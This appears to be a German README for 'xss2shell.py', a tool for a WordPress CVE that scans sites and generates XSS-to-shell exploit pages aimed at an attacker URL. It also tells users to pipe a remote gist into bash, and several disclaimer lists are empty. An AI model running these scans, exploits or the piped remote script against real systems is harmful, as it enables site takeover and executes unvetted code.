
CVE-2026-64638 - Entwurf oder TODO
Unterstütze die Wartung dieses Projekts über PayPal oder durch Scannen des folgenden QR-Codes.
Verwende dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Beispielverwendung:
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
Hinweis:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte Verzeichnis .git zu entfernenEin Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich der Bildung und autorisierten Sicherheitsforschung.
Es wurde entwickelt, um Nutzern Folgendes näherzubringen:
Verwende dieses Repository nur in Umgebungen, in denen du die Erlaubnis hast, wie zum Beispiel:
Unautorisierte oder illegale Nutzung ist strengstens untersagt.
Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmst du Folgendem zu:
Dieses Projekt ist gedacht für:
Bitte befolge Praktiken der verantwortungsvollen Offenlegung (Responsible Disclosure) und halte alle geltenden Gesetze ein.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktiere den Repository-Betreuer über GitHub.